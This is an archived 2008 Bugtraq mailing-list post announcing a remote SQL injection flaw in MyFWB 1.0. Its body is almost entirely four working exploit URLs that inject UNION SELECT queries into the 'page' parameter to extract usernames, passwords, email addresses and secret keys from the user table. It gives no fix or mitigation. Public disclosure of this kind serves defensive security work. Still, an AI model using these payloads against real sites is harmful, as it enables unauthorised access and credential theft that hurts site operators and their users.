MyFWB 1.0 Remote SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MyFWB 1.0 Remote SQL Injection
From: Guns@xxxxxxxxxxx
Date: Sat, 20 Sep 2008 10:10:13 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

MyFWB 1.0 Remote SQL Injection

Author: 0x90
url: www.0x90.com.ar
Product: MyFWB
download: http://myfwb.co.cc/downloads/myfwb_1.0_FS_edition.zip
Version: 1.0
URL: http://www.fsoft.co.nr/
Vulnerability Class: SQL Injection
contact: Guns[at]0x90[dot]com[dot]ar


Username:
http://host/MyFWB/?page=-0x90+union+select+0,0,username,0+from+user

Password:
http://host/MyFWB/?page=-0x90+union+select+0,0,password,0+from+user

Email:
http://host/MyFWB/?page=-0x90+union+select+0,0,useremail,0+from+user

Secret Key:
http://host/MyFWB/?page=-0x90+union+select+0,0,secret,0+from+user

Prev by Date: [SECURITY] [DSA 1634-2] New wordnet packages fix regression
Next by Date: drupal: Session hijacking vulnerability, CVE-2008-3661
Previous by thread: [SECURITY] [DSA 1634-2] New wordnet packages fix regression
Next by thread: drupal: Session hijacking vulnerability, CVE-2008-3661
Index(es):
- Date
- Thread